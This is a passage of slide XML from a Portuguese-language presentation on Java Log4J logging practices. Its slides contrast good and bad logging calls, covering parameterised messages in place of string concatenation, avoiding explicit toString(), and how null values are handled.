            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7636475" y="3003125"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="1752600"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>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9" name="Shape 549"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p8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2. Evite concatena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ções de string </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>(por questões de performance)</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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552" name="Google Shape;552;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044475" y="1877550"/>
            <a:ext cx="21600" cy="1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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Google Shape;553;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1612875"/>
            <a:ext cx="8680500" cy="227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sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Good</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("Found {} records for user {}", count, userId);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Bad</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("Found " + count + " records for user " + userId);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8322275" y="2774525"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="1371600"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3380800" y="4126575"/>
            <a:ext cx="4506900" cy="780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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concatenações são realizadas mesmo </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quando o nível de logging está desativado</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p81"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285775" y="3509600"/>
            <a:ext cx="762600" cy="727800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p81"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4207825" y="3578900"/>
            <a:ext cx="152400" cy="617100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="559" name="Google Shape;559;p81"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4568075" y="3551175"/>
            <a:ext cx="2710500" cy="676500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447625" y="4022550"/>
            <a:ext cx="2509500" cy="10314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sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void debug(String msg) {</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if (isDebugEnabled())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      ....</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1587450" y="3558125"/>
            <a:ext cx="194100" cy="3327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5" name="Shape 565"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Google Shape;566;p8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3. N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ão use toString()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>(será chamado automaticamente pelo Log4J)</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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568" name="Google Shape;568;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044475" y="1877550"/>
            <a:ext cx="21600" cy="1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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1612875"/>
            <a:ext cx="8680500" cy="2539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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Good</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("userId: {}", userId);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Bad</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("userId: {}", userId.toString());</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493475" y="2850725"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="1752600"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>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5" name="Shape 575"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;p8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Continua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Não use toString()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Google Shape;577;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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578" name="Google Shape;578;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044475" y="1877550"/>
            <a:ext cx="21600" cy="1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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1612875"/>
            <a:ext cx="8680500" cy="2016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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Safely handles null - prints "null"</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("userId: {}", userId);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
